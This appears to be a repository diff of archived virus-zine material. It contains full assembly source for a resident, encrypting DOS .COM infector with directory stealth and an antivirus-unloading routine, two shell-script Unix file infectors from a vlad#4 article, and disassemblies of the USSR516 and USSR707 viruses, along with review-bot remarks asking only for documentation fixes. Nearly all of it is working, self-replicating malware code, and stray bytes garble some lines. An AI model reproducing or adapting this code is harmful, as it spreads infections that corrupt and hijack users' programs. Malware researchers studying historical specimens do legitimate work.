mov ah,4ah ;used memory
|
||||
int 21h ;put the new value to MCB
|
||||
;---------------------------------------------------------------
|
||||
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
|
||||
mov ah,48h ;
|
||||
int 21h ;request the memory to fuck DOS!
|
||||
;---------------------------------------------------------------
|
||||
dec ax ;ax=new segment
|
||||
mov es,ax ;ax-1= new segment MCB
|
||||
mov byte ptr es:[1],8 ;put '8' in the segment
|
||||
;--------------------------------------------------------------
|
||||
inc ax ;
|
||||
mov es,ax ;es = new segment
|
||||
lea si,[bp + offset start] ;si = start of virus
|
||||
mov di,100h ;di = 100H (psp position)
|
||||
mov cx,offset fin - start ;cx = lag of virus
|
||||
push cs ;
|
||||
pop ds ;ds = cs
|
||||
cld ;mov the code
|
||||
rep movsb ;ds:si >> es:di
|
||||
;--------------------------------------------------------------
|
||||
mov dx,offset virus ;dx = new int21 handler
|
||||
mov ax,2521h ;
|
||||
push es ;
|
||||
pop ds ;
|
||||
int 21h ;set the vectors
|
||||
;-------------------------------------------------------------
|
||||
pum2: ;
|
||||
;
|
||||
mov ah,byte ptr [cs:bp + real] ;restore the 3
|
||||
mov byte ptr cs:[100h],ah ;first bytes
|
||||
mov ax,word ptr [cs:bp + real + 1] ;
|
||||
mov word ptr cs:[101h],ax ;
|
||||
;-------------------------------------------------------------
|
||||
mov ax,100h ;
|
||||
jmp ax ;jmp to execute
|
||||
;
|
||||
;*****************************************************************
|
||||
;* HANDLER FOR THE INT 21H
|
||||
;*****************************************************************
|
||||
;
|
||||
VIRUS: ;
|
||||
;
|
||||
cmp ah,4bh ;is a 4b function?
|
||||
je REPRODUCCION ;yes! jump to reproduce !
|
||||
cmp ah,11h
|
||||
je dir
|
||||
cmp ah,12h
|
||||
je dir
|
||||
dirsal:
|
||||
cmp AX,0CACAH ;is ... a caca function? (resident chek)
|
||||
jne a3 ;no! jump to a3
|
||||
mov bh,0cah ;yes! put ca in bh
|
||||
a3: ;
|
||||
JMP dword ptr CS:[INT21] ;jmp to original int 21h
|
||||
ret ;
|
||||
make db '[NuKE] N.R.L.G. AZRAEL'
|
||||
dir:
|
||||
jmp dir_s
|
||||
;-------------------------------------------------------------
|
||||
REPRODUCCION: ;
|
||||
;
|
||||
pushf ;put the register
|
||||
pusha ;in the stack
|
||||
push si ;
|
||||
push di ;
|
||||
push bp ;
|
||||
push es ;
|
||||
push ds ;
|
||||
;-------------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;
|
||||
mov ax,3524H ;get the dos error control
|
||||
int 21h ;interupt
|
||||
mov word ptr error,es ;and put in cs:error
|
||||
mov word ptr error+2,bx ;
|
||||
mov ax,2524H ;change the dos error control
|
||||
mov dx,offset all ;for my "trap mask"
|
||||
int 21h ;
|
||||
;-------------------------------------------------------------
|
||||
pop ds ;
|
||||
pop es ;restore the registers
|
||||
pop bp ;
|
||||
pop di ;
|
||||
pop si ;
|
||||
popa ;
|
||||
popf ;
|
||||
;-------------------------------------------------------------
|
||||
pushf ;put the registers
|
||||
pusha ;
|
||||
push si ;HEY! AZRAEL IS CRAZY?
|
||||
push di ;PUSH, POP, PUSH, POP
|
||||
push bp ;PLEEEEEAAAAAASEEEEEEEEE
|
||||
push es ;PURIFY THIS SHIT!
|
||||
push ds ;
|
||||
;-------------------------------------------------------------
|
||||
mov ax,4300h ;
|
||||
int 21h ;get the file
|
||||
mov word ptr cs:[attrib],cx ;atributes
|
||||
;-------------------------------------------------------------
|
||||
mov ax,4301h ;le saco los atributos al
|
||||
xor cx,cx ;file
|
||||
int 21h ;
|
||||
;-------------------------------------------------------------
|
||||
mov ax,3d02h ;open the file
|
||||
int 21h ;for read/write
|
||||
mov bx,ax ;bx=handle
|
||||
;-------------------------------------------------------------
|
||||
mov ax,5700h ;
|
||||
int 21h ;get the file date
|
||||
mov word ptr cs:[hora],cx ;put the hour
|
||||
mov word ptr cs:[dia],dx ;put the day
|
||||
and cx,word ptr cs:[fecha] ;calculate the seconds
|
||||
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
|
||||
jne seguir ;yes! the file is infected!
|
||||
jmp cerrar ;
|
||||
;------------------------------------------------------------
|
||||
seguir: ;
|
||||
mov ax,4202h ;move the pointer to end
|
||||
call movedor ;of the file
|
||||
;------------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;
|
||||
sub ax,3 ;calculate the
|
||||
mov word ptr [cs:largo],ax ;jmp long
|
||||
;-------------------------------------------------------------
|
||||
mov ax,04200h ;move the pointer to
|
||||
call movedor ;start of file
|
||||
;----------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;read the 3 first bytes
|
||||
mov ah,3fh ;
|
||||
mov cx,3 ;
|
||||
lea dx,[cs:real] ;put the bytes in cs:[real]
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
|
||||
jne er1 ;yes! is a EXE... fuckkk!
|
||||
;----------------------------------------------------------
|
||||
jmp cerrar
|
||||
er1:
|
||||
;----------------------------------------------------------
|
||||
mov ax,4200h ;move the pointer
|
||||
call movedor ;to start fo file
|
||||
;----------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;
|
||||
mov ah,40h ;
|
||||
mov cx,1 ;write the JMP
|
||||
lea dx,[cs:jump] ;instruccion in the
|
||||
int 21h ;fist byte of the file
|
||||
;----------------------------------------------------------
|
||||
mov ah,40h ;write the value of jmp
|
||||
mov cx,2 ;in the file
|
||||
lea dx,[cs:largo] ;
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
mov ax,04202h ;move the pointer to
|
||||
call movedor ;end of file
|
||||
;----------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;move the code
|
||||
push cs ;of my virus
|
||||
pop es ;to cs:end+50
|
||||
cld ;for encrypt
|
||||
mov si,100h ;
|
||||
mov di,offset fin + 50 ;
|
||||
mov cx,offset fin - 100h ;
|
||||
rep movsb ;
|
||||
;----------------------------------------------------------
|
||||
mov cx,offset fin
|
||||
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
|
||||
enc: ;
|
||||
xor byte ptr cs:[di],1 ;encrypt the virus
|
||||
inc di ;code
|
||||
loop enc ;
|
||||
;---------------------------------------------------------
|
||||
mov cx,offset fin
|
||||
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
|
||||
mov dx,1
|
||||
enc2: ;
|
||||
|
||||
xor word ptr [di],06acdh
|
||||
not byte ptr [di]
|
||||
add word ptr [di],04a83h
|
||||
xor word ptr [di],0c3d7h
|
||||
dec word ptr [di]
|
||||
dec byte ptr [di]
|
||||
not word ptr [di]
|
||||
sub word ptr [di],0aa17h
|
||||
xor word ptr [di],0e185h
|
||||
add byte ptr [di],0b9h
|
||||
xor byte ptr [di],061h
|
||||
sub byte ptr [di],075h
|
||||
xor byte ptr [di],030h
|
||||
dec word ptr [di]
|
||||
xor byte ptr [di],022h
|
||||
dec word ptr [di]
|
||||
add byte ptr [di],087h
|
||||
ÿinc di
|
||||
inc di ;the virus code
|
||||
loop enc2 ;
|
||||
;--------------------------------------------
|
||||
mov ah,40h ;
|
||||
mov cx,offset fin - offset start ;copy the virus
|
||||
mov dx,offset fin + 50 ;to end of file
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
cerrar: ;
|
||||
;restore the
|
||||
mov ax,5701h ;date and time
|
||||
mov cx,word ptr cs:[hora] ;file
|
||||
mov dx,word ptr cs:[dia] ;
|
||||
or cx,word ptr cs:[fecha] ;and mark the seconds
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
mov ah,3eh ;
|
||||
int 21h ;close the file
|
||||
;----------------------------------------------------------
|
||||
pop ds ;
|
||||
pop es ;restore the
|
||||
pop bp ;registers
|
||||
pop di ;
|
||||
pop si ;
|
||||
popa ;
|
||||
popf ;
|
||||
;----------------------------------------------------------
|
||||
pusha ;
|
||||
;
|
||||
mov ax,4301h ;restores the atributes
|
||||
mov cx,word ptr cs:[attrib] ;of the file
|
||||
int 21h ;
|
||||
;
|
||||
popa ;
|
||||
;----------------------------------------------------------
|
||||
pushf ;
|
||||
pusha ; 8-( = f-prot
|
||||
push si ;
|
||||
push di ; 8-( = tbav
|
||||
push bp ;
|
||||
push es ; 8-) = I'm
|
||||
push ds ;
|
||||
;----------------------------------------------------------
|
||||
mov ax,2524H ;
|
||||
lea bx,error ;restore the
|
||||
mov ds,bx ;errors handler
|
||||
lea bx,error+2 ;
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
pop ds ;
|
||||
pop es ;
|
||||
pop bp ;restore the
|
||||
pop di ;resgisters
|
||||
pop si ;
|
||||
popa ;
|
||||
popf ;
|
||||
;----------------------------------------------------------
|
||||
JMP A3 ;jmp to orig. INT 21
|
||||
;
|
||||
;**********************************************************
|
||||
; SUBRUTINES AREA
|
||||
;**********************************************************
|
||||
;
|
||||
movedor: ;
|
||||
;
|
||||
xor cx,cx ;use to move file pointer
|
||||
xor dx,dx ;
|
||||
int 21h ;
|
||||
ret ;
|
||||
;----------------------------------------------------------
|
||||
all: ;
|
||||
;
|
||||
XOR AL,AL ;use to set
|
||||
iret ;error flag
|
||||
|
||||
;***********************************************************
|
||||
; DATA AREA
|
||||
;***********************************************************
|
||||
largo dw ?
|
||||
jump db 0e9h
|
||||
real db 0cdh,20h,0
|
||||
hora dw ?
|
||||
dia dw ?
|
||||
attrib dw ?
|
||||
int21 dd ?
|
||||
error dd ?
|
||||
|
||||
ÿ;---------------------------------
|
||||
action: ;
|
||||
MOV AH,2AH ;
|
||||
INT 21H ;get date
|
||||
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
|
||||
JE cont ;nop! fuck ret
|
||||
cmp byte ptr cs:[action_dia+bp],32 ;
|
||||
jne no_day ;
|
||||
cont: ;
|
||||
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
|
||||
je set ;
|
||||
cmp byte ptr cs:[action_mes+bp],13 ;
|
||||
jne NO_DAY ;nop! fuck ret
|
||||
set: ;
|
||||
mov cx,50 ;50 beep's!
|
||||
beep: ;beep label!
|
||||
mov ax,0E07h ;
|
||||
int 10h ;print beep char
|
||||
loop beep ;go!
|
||||
NO_DAY: ;
|
||||
ret ;
|
||||
;---------------------------------
|
||||
|
||||
ÿ;---------------------------------
|
||||
ANTI_V: ;
|
||||
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
|
||||
MOV DX,5945H ;
|
||||
INT 21H ;
|
||||
ret ;
|
||||
;---------------------------------
|
||||
|
||||
ÿ;*****************************************************
|
||||
dir_s:
|
||||
pushf
|
||||
push cs
|
||||
call a3 ;Get file Stats
|
||||
test al,al ;Good FCB?
|
||||
jnz no_good ;nope
|
||||
push ax
|
||||
push bx
|
||||
push es
|
||||
mov ah,51h ;Is this Undocmented? huh...
|
||||
int 21h
|
||||
mov es,bx
|
||||
cmp bx,es:[16h]
|
||||
jnz not_infected
|
||||
mov bx,dx
|
||||
mov al,[bx]
|
||||
push ax
|
||||
mov ah,2fh ;Get file DTA
|
||||
int 21h
|
||||
pop ax
|
||||
inc al
|
||||
jnz fcb_okay
|
||||
add bx,7h
|
||||
fcb_okay: mov ax,es:[bx+17h]
|
||||
and ax,1fh ;UnMask Seconds Field
|
||||
xor al,byte ptr cs:fechad
|
||||
jnz not_infected
|
||||
and byte ptr es:[bx+17h],0e0h
|
||||
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
|
||||
sbb es:[bx+1fh],ax
|
||||
not_infected:pop es
|
||||
pop bx
|
||||
pop ax
|
||||
no_good: iret
|
||||
;********************************************************************
|
||||
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
|
||||
;*********************************************************************
|
||||
|
||||
action_dia Db 01fH ;day for the action
|
||||
action_mes Db 0cH ;month for the action
|
||||
FECHA DW 01eH ;Secon for mark
|
||||
FECHAd Db 01eH ;Secon for mark dir st
|
||||
fin:
|
||||
code ends
|
||||
end start
|
|
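Review bot: Seven lines in this listing begin with a stray `ÿ` (L67289, L67340, L67453, L68108, L68370, L68438, L68461), which appears to be a byte-encoding artifact of the upload rather than assembler source, so the file as committed likely no longer matches the original listing byte-for-byte. A comment at the top noting it, e.g. `; NOTE: the stray 0FFh byte at the start of some lines is an artifact of this archive copy, not part of the original listing`, would keep anyone diffing this copy against another archive from chasing a phantom difference. The mixed Spanish/English comments are the author's and should stay as they are.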
@ -0,0 +1,63 @@
|
|||
|
||||
Lame Unix Viruses
|
||||
+---------------+
|
||||
|
||||
Well, you might have read the title to this article and thought, well
|
||||
if the damn thing is lame.. why the fuck is it in vlad#4 ?! This can
|
||||
be answered quite simply, we had one free space! :) It was a bit of
|
||||
a dilemma to begin with, we had four articles and one space. The problem
|
||||
was they were all kinda lame. So it was a lame pick of the month episode.
|
||||
|
||||
Out of the four articles this was the leastest lamest. Well actually
|
||||
I don't know about that, but anyway it was the most different one we
|
||||
had sitting there. Just to prove the title, the author of these
|
||||
masterpieces asked to remain anonymous to save his reputation.
|
||||
|
||||
These "viruses" are the equivalent of a DOS batch file infector because
|
||||
they are written in shell language. They function similarly to companion
|
||||
infectors by renaming the original file and replacing it with themselves.
|
||||
Disinfection is simple by 'mv'ing (moving) the original files back.
|
||||
|
||||
Anyway, perhaps someone is interested so here they are. There isn't
|
||||
much use for them except to annoy your friends when it messes up all
|
||||
the files in their directory.
|
||||
|
||||
+-----------------------------------+
|
||||
#!/bin/sh
|
||||
# Dumb Unix Virus
|
||||
# I dont wanna write anutha dumb unix virus qark, i wont
|
||||
# Due to excess lameness, dont distribute
|
||||
# <Author's name withheld for obvious reasons>
|
||||
for files in *
|
||||
do
|
||||
if [ -x files ]
|
||||
then
|
||||
if [ ! -d files ]
|
||||
then
|
||||
mv files files.EVILVIRUS.HELPME
|
||||
cp $0 files
|
||||
chmod +x files
|
||||
files.EVILVIRUS.HELPME
|
||||
fi
|
||||
fi
|
||||
|
||||
+-----------------------------------+
|
||||
|
||||
cat << _EOF >unix.virus
|
||||
|
||||
|
||||
#!/bin/csh
|
||||
# Dumber Unix Virus
|
||||
# by
|
||||
# SumUtherGuy
|
||||
foreach i (*)
|
||||
mv $i bak.$i
|
||||
cp $0 $i
|
||||
i >> $i
|
||||
|
||||
end
|
||||
_EOF
|
||||
|
||||
+-----------------------------------+
|
||||
|
||||
|
|
@ -0,0 +1,278 @@
|
|||
ussr516 segment byte public
|
||||
assume cs:ussr516, ds:ussr516
|
||||
org 100h
|
||||
; Disassembled by Dark Angel of PHALCON/SKISM
|
||||
; for 40Hex Number 7 Volume 2 Issue 3
|
||||
stub: db 0e9h, 0, 0
|
||||
db 0e9h, 1, 0, 0
|
||||
; This is where the virus really begins
|
||||
start:
|
||||
push ax
|
||||
call beginvir
|
||||
|
||||
orig4 db 0cdh, 20h, 0, 0
|
||||
int30store db 0, 0, 0, 0 ; Actually it's int 21h
|
||||
; entry point
|
||||
int21store db 0, 0, 0, 0
|
||||
|
||||
beginvir: pop bp ; BP -> orig4
|
||||
mov si,bp
|
||||
mov di,103h
|
||||
add di,[di-2] ; DI -> orig4
|
||||
movsw ; restore original
|
||||
movsw ; 4 bytes of program
|
||||
xor si,si
|
||||
mov ds,si
|
||||
les di,dword ptr ds:[21h*4]
|
||||
mov [bp+8],di ; int21store
|
||||
mov [bp+0Ah],es
|
||||
lds di,dword ptr ds:[30h*4+1] ; Bug????
|
||||
findmarker:
|
||||
inc di
|
||||
cmp word ptr [di-2],0E18Ah ; Find marker bytes
|
||||
jne findmarker ; to the entry point
|
||||
mov [bp+4],di ; and move to
|
||||
mov [bp+6],ds ; int30store
|
||||
mov ax,5252h ; Get list of lists
|
||||
int 21h ; and also ID check
|
||||
|
||||
add bx,12h ; Already installed?
|
||||
jz quitvir ; then exit
|
||||
push bx
|
||||
mov ah,30h ; Get DOS version
|
||||
int 21h
|
||||
|
||||
pop bx ; bx = 12, ptr to 1st
|
||||
; disk buffer
|
||||
cmp al,3
|
||||
je handlebuffer ; if DOS 3
|
||||
ja handleDBHCH ; if > DOS 3
|
||||
inc bx ; DOS 2.X, offset is 13
|
||||
handlebuffer:
|
||||
push ds
|
||||
push bx
|
||||
lds bx,dword ptr [bx] ; Get seg:off of buffer
|
||||
inc si
|
||||
pop di
|
||||
pop es ; ES:DI->seg:off buff
|
||||
mov ax,[bx] ; ptr to next buffer
|
||||
cmp ax,0FFFFh ; least recently used?
|
||||
jne handlebuffer ; if not, go find it
|
||||
cmp si,3
|
||||
jbe quitvir
|
||||
stosw
|
||||
stosw
|
||||
jmp short movetobuffer
|
||||
handleDBHCH: ; Disk Buffer Hash Chain Head array
|
||||
lds si,dword ptr [bx] ; ptr to disk buffer
|
||||
lodsw ; info
|
||||
lodsw ; seg of disk buffer
|
||||
; hash chain head array
|
||||
inc ax ; second entry
|
||||
mov ds,ax
|
||||
xor bx,bx
|
||||
mov si,bx
|
||||
lodsw ; EMS page, -1 if not
|
||||
; in EMS
|
||||
xchg ax,di ; save in di
|
||||
lodsw ; ptr to least recently
|
||||
; used buffer
|
||||
mov [di+2],ax ; change disk buffer
|
||||
; backward offset to
|
||||
; least recently used
|
||||
xchg ax,di ; restore EMS page
|
||||
mov [di],ax ; set to least recently
|
||||
movetobuffer: ; used
|
||||
mov di,bx
|
||||
push ds
|
||||
pop es ; ES:DI -> disk buffer
|
||||
push cs
|
||||
pop ds
|
||||
mov cx,108h
|
||||
lea si,[bp-4] ; Copy from start
|
||||
rep movsw
|
||||
mov ds,cx ; DS -> interrupt table
|
||||
mov word ptr ds:[4*21h],0BCh ; New interrupt handler
|
||||
mov word ptr ds:[4*21h+2],es ; at int21
|
||||
quitvir:
|
||||
push cs ; CS = DS = ES
|
||||
pop es
|
||||
push es
|
||||
pop ds
|
||||
pop ax
|
||||
mov bx,ax
|
||||
mov si, 100h ; set up stack for
|
||||
push si ; the return to the
|
||||
retn ; original program
|
||||
int24:
|
||||
mov al,3 ; Ignore all errors
|
||||
iret
|
||||
tickstore db 3 ; Why???
|
||||
buffer db 3, 0, 9, 0
|
||||
|
||||
int21:
|
||||
pushf
|
||||
cli ; CP/M style call entry
|
||||
call dword ptr cs:[int30store-start]
|
||||
retn ; point of int 21h
|
||||
|
||||
int21DSDX: ; For int 21h calls
|
||||
push ds ; with
|
||||
lds dx,dword ptr [bp+2] ; DS:DX -> filename
|
||||
call int21
|
||||
pop ds
|
||||
retn
|
||||
|
||||
cmp ax,4B00h ; Execute
|
||||
je Execute
|
||||
cmp ax,5252h ; ID check
|
||||
je CheckID
|
||||
cmp ah,30h ; DOS Version
|
||||
je DosVersion
|
||||
callorig21: ; Do other calls
|
||||
jmp dword ptr cs:[int21store-start]
|
||||
DosVersion: ; Why????? ; DOS Version
|
||||
dec byte ptr cs:[tickstore-start]
|
||||
jnz callorig21 ; Continue if not 0
|
||||
push es
|
||||
xor ax,ax
|
||||
push ax
|
||||
mov es,ax
|
||||
mov al,es:[46Ch] ; 40h:6Ch = Timer ticks
|
||||
; since midnight
|
||||
and al,7 ; MOD 15
|
||||
inc ax
|
||||
inc ax
|
||||
mov cs:[tickstore-start],al ; # 2-17
|
||||
pop ax
|
||||
pop es
|
||||
iret
|
||||
CheckID: ; ID Check
|
||||
mov bx,0FFEEh ; FFEEh = -12h
|
||||
iret
|
||||
Execute: ; Execute
|
||||
push ax ; Save registers
|
||||
push cx
|
||||
push es
|
||||
push bx
|
||||
push ds ; DS:DX -> filename
|
||||
push dx ; save it on stack
|
||||
push bp
|
||||
mov bp,sp ; Set up stack frame
|
||||
sub sp,0Ah ; Temporary variables
|
||||
; [bp-A] = attributes
|
||||
; [bp-8] = int 24 off
|
||||
; [bp-6] = int 24 seg
|
||||
; [bp-4] = file time
|
||||
; [bp-2] = file date
|
||||
sti
|
||||
push cs
|
||||
pop ds
|
||||
mov ax,3301h ; Turn off ^C check
|
||||
xor dl,dl ; (never turn it back
|
||||
call int21 ; on. Bug???)
|
||||
mov ax,3524h ; Get int 24h
|
||||
call int21 ; (Critical error)
|
||||
mov [bp-8],bx
|
||||
mov [bp-6],es
|
||||
mov dx,int24-start
|
||||
mov ax,2524h ; Set to new one
|
||||
call int21
|
||||
mov ax,4300h ; Get attributes
|
||||
call int21DSDX
|
||||
jnc continue
|
||||
doneinfect:
|
||||
mov ax,2524h ; Restore crit error
|
||||
lds dx,dword ptr [bp-8] ; handler
|
||||
call int21
|
||||
cli
|
||||
mov sp,bp
|
||||
pop bp
|
||||
pop dx
|
||||
pop ds
|
||||
pop bx
|
||||
pop es
|
||||
pop cx
|
||||
pop ax
|
||||
jmp short callorig21 ; Call orig handler
|
||||
continue:
|
||||
mov [bp-0Ah],cx ; Save attributes
|
||||
test cl,1 ; Check if r/o????
|
||||
jz noclearattr
|
||||
xor cx,cx
|
||||
mov ax,4301h ; Clear attributes
|
||||
call int21DSDX ; Filename in DS:DX
|
||||
jc doneinfect ; Quit on error
|
||||
noclearattr:
|
||||
mov ax,3D02h ; Open read/write
|
||||
call int21DSDX ; Filename in DS:DX
|
||||
jc doneinfect ; Exit if error
|
||||
mov bx,ax
|
||||
mov ax,5700h ; Save time/date
|
||||
call int21
|
||||
mov [bp-4],cx
|
||||
mov [bp-2],dx
|
||||
mov dx,buffer-start
|
||||
mov cx,4
|
||||
mov ah,3Fh ; Read 4 bytes to
|
||||
call int21 ; buffer
|
||||
jc quitinf
|
||||
cmp byte ptr ds:[buffer-start],0E9h; Must start with 0E9h
|
||||
jne quitinf ; Otherwise, quit
|
||||
mov dx,word ptr ds:[buffer+1-start]; dx = jmploc
|
||||
dec dx
|
||||
xor cx,cx
|
||||
mov ax,4201h ; go there
|
||||
call int21
|
||||
mov ds:[buffer-start],ax ; new location offset
|
||||
mov dx,orig4-start
|
||||
mov cx,4
|
||||
mov ah,3Fh ; Read 4 bytes there
|
||||
call int21
|
||||
mov dx,ds:[orig4-start]
|
||||
cmp dl,0E9h ; 0E9h means we might
|
||||
jne infect ; already be there
|
||||
mov ax,ds:[orig4+2-start] ; continue checking
|
||||
add al,dh ; to see if we really
|
||||
sub al,ah ; are there.
|
||||
jz quitinf
|
||||
infect:
|
||||
xor cx,cx
|
||||
mov dx,cx
|
||||
mov ax,4202h ; Go to EOF
|
||||
call int21
|
||||
mov ds:[buffer+2-start],ax ; save filesize
|
||||
mov cx,204h
|
||||
mov ah,40h ; Write virus
|
||||
call int21
|
||||
jc quitinf ; Exit if error
|
||||
sub cx,ax
|
||||
jnz quitinf
|
||||
mov dx,ds:[buffer-start]
|
||||
mov ax,ds:[buffer+2-start]
|
||||
sub ax,dx
|
||||
sub ax,3 ; AX->jmp offset
|
||||
mov word ptr ds:[buffer+1-start],ax; Set up buffer
|
||||
mov byte ptr ds:[buffer-start],0E9h; code the jmp
|
||||
add al,ah
|
||||
mov byte ptr ds:[buffer+3-start],al
|
||||
mov ax,4200h ; Rewind to jmploc
|
||||
call int21
|
||||
mov dx, buffer-start
|
||||
mov cx,4 ; Write in the jmp
|
||||
mov ah,40h
|
||||
call int21
|
||||
quitinf:
|
||||
mov cx,[bp-4]
|
||||
mov dx,[bp-2]
|
||||
mov ax,5701h ; Restore date/time
|
||||
call int21
|
||||
mov ah,3Eh ; Close file
|
||||
call int21
|
||||
mov cx,[bp-0Ah] ; Restore attributes
|
||||
mov ax,4301h
|
||||
call int21DSDX
|
||||
jmp doneinfect ; Return
|
||||
ussr516 ends
|
||||
end stub
|
||||
|
|
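Review bot: The disassembly opens with only a two-line credit (L68788–L68791) and leaves the analyst's open questions inline as `; Bug????` (L69861) and `; Why???` / `; Why?????` (L69102, L69171) with no resolution. A short header paragraph recording what the analyst concluded about those points, or stating that they remain unresolved, plus the 40Hex issue date, would keep the annotation useful to the next reader; as committed the question marks read as unfinished notes rather than documented findings.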
@ -0,0 +1,408 @@
|
|||
|
||||
PAGE 59,132
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ USSR707 ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Created: 9-Feb-92 ÛÛ
|
||||
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
data_1e equ 20h
|
||||
data_2e equ 22h
|
||||
data_3e equ 4Ch
|
||||
data_4e equ 4Eh
|
||||
data_5e equ 84h
|
||||
data_6e equ 86h
|
||||
data_7e equ 413h
|
||||
data_8e equ 1460h
|
||||
data_9e equ 3
|
||||
data_10e equ 2
|
||||
|
||||
seg_a segment byte public
|
||||
assume cs:seg_a, ds:seg_a
|
||||
|
||||
|
||||
org 100h
|
||||
|
||||
ussr707 proc far
|
||||
|
||||
start:
|
||||
mov ax,offset loc_2
|
||||
push ax
|
||||
retn
|
||||
loc_2:
|
||||
jmp short loc_3
|
||||
nop
|
||||
|
||||
ussr707 endp
|
||||
|
||||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
; SUBROUTINE
|
||||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||||
|
||||
sub_2 proc near
|
||||
call sub_3
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_3:
|
||||
pop di
|
||||
sub di,6
|
||||
retn
|
||||
sub_2 endp
|
||||
|
||||
db 60h, 14h, 2Bh, 02h, 2Eh, 3Ah
|
||||
db 26h,0FFh, 0Dh, 00h,0A0h, 00h
|
||||
db 50h,0C3h, 01h, 2Eh,0A3h,0C0h
|
||||
db 00h, 9Ch, 00h, 00h, 90h, 90h
|
||||
db 90h,0CDh
|
||||
db 20h
|
||||
loc_3:
|
||||
call sub_2
|
||||
mov ah,[di+21h]
|
||||
mov byte ptr ds:[100h],ah
|
||||
mov ax,[di+22h]
|
||||
mov word ptr ds:[101h],ax
|
||||
mov ax,[di+24h]
|
||||
mov word ptr ds:[103h],ax
|
||||
mov ah,30h ; '0'
|
||||
int 21h ; DOS Services ah=function 30h
|
||||
; get DOS version number ax
|
||||
cmp ax,1E03h
|
||||
je loc_4 ; Jump if equal
|
||||
jmp loc_9
|
||||
loc_4:
|
||||
mov bl,0
|
||||
mov ax,4BFFh
|
||||
int 21h ; ??INT Non-standard interrupt
|
||||
cmp bl,0FFh
|
||||
jne loc_5 ; Jump if not equal
|
||||
jmp loc_9
|
||||
loc_5:
|
||||
mov ax,ds:data_10e
|
||||
mov [di+14h],ax
|
||||
mov bx,di
|
||||
add bx,0Fh
|
||||
xor ax,ax ; Zero register
|
||||
mov es,ax
|
||||
loc_6:
|
||||
xor si,si ; Zero register
|
||||
mov ax,es
|
||||
inc ax
|
||||
cmp ax,0FFFh
|
||||
jbe loc_7 ; Jump if below or =
|
||||
jmp short loc_9
|
||||
nop
|
||||
loc_7:
|
||||
mov es,ax
|
||||
loc_8:
|
||||
mov ah,es:data_8e[si]
|
||||
cmp ah,[bx+si]
|
||||
jne loc_6 ; Jump if not equal
|
||||
inc si
|
||||
cmp si,5
|
||||
jne loc_8 ; Jump if not equal
|
||||
mov [di+0Dh],es
|
||||
mov word ptr [di+1Fh],0
|
||||
mov ax,cs
|
||||
dec ax
|
||||
mov es,ax
|
||||
call sub_7
|
||||
sub si,di
|
||||
mov ax,si
|
||||
mov cl,4
|
||||
shr ax,cl ; Shift w/zeros fill
|
||||
inc ax
|
||||
sub es:data_9e,ax
|
||||
sub ds:data_10e,ax
|
||||
mov bx,[di+14h]
|
||||
sub bx,ax
|
||||
mov es,bx
|
||||
push di
|
||||
call sub_4
|
||||
xor cx,cx ; Zero register
|
||||
mov ds,cx
|
||||
mov cl,6
|
||||
shr ax,cl ; Shift w/zeros fill
|
||||
inc ax
|
||||
sub ds:data_7e,ax
|
||||
mov ax,ds:data_5e
|
||||
mov cs:[bx+0Bh],ax
|
||||
mov ax,ds:data_6e
|
||||
mov cs:[bx+0Dh],ax
|
||||
push cs
|
||||
pop ds
|
||||
mov cx,si
|
||||
mov si,di
|
||||
xor di,di ; Zero register
|
||||
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
|
||||
pop di
|
||||
sub bx,di
|
||||
add bx,2
|
||||
xor ax,ax ; Zero register
|
||||
mov ds,ax
|
||||
cli ; Disable interrupts
|
||||
mov ds:data_5e,bx
|
||||
mov ds:data_6e,es
|
||||
sti ; Enable interrupts
|
||||
loc_9:
|
||||
push cs
|
||||
pop ds
|
||||
push cs
|
||||
pop es
|
||||
mov ax,offset start
|
||||
push ax
|
||||
retn
|
||||
|
||||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
